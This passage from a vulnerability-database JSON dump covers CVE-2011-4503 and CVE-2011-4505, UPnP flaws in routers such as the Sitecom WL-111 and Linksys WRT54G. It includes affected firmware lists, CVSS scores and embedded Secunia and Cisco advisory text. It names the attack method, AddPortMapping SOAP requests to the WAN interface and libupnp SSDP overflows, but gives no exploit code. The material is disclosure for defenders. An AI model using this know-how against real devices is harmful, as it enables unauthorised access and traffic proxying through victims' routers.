"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4505"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4505"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52450"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:06.090000",
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"date": "2012-03-08T00:00:00",
"db": "VULHUB",
"id": "VHN-52450"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2012-03-08T05:00:00",
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
],
"trust": 0.6
}
}
VAR-201111-0159
Vulnerability from variot - Updated: 2023-12-18 12:09The UPnP IGD implementation in Broadcom Linux on the Sitecom WL-111 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. A vulnerability exists in the UPnP IGD installation of Broadcom Linux for Sitecom WL-111. This vulnerability is related to the \"external forwarding\" vulnerability. An attacker can exploit this issue to gain unauthorized access to scan the internal host or proxy internet traffic through an affected device. The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5 Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1 Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1 Cisco Linksys WRT54GX firmware 2.00.05 Edimax BR-6104K prior to 3.25 Edimax 6114Wg Canyon-Tech CN-WF512 firmware version 1.83 Canyon-Tech CN-WF514 firmware version 2.08 Sitecom WL-153 prior to firmware 1.39 Sitecom WL-111 Sweex LB000021 firmware version 3.15 ZyXEL P-330W SpeedTouch 5x6 firmware versions prior to 6.2.29 Thomson TG585 firmware versions prior to 7.4.3.2. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0159",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": null,
"trust": 2.0,
"vendor": "broadcom",
"version": null
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wl-111",
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.3,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.3,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.3,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.3,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.3,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.3,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.3,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.3,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:broadcom:broadcom_linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sitecom:wl-111:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4503"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4503",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4503",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4503",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-365",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation in Broadcom Linux on the Sitecom WL-111 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. A vulnerability exists in the UPnP IGD installation of Broadcom Linux for Sitecom WL-111. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. \nAn attacker can exploit this issue to gain unauthorized access to scan the internal host or proxy internet traffic through an affected device. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.77
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.7
},
{
"db": "NVD",
"id": "CVE-2011-4503",
"trust": 3.3
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-5043",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
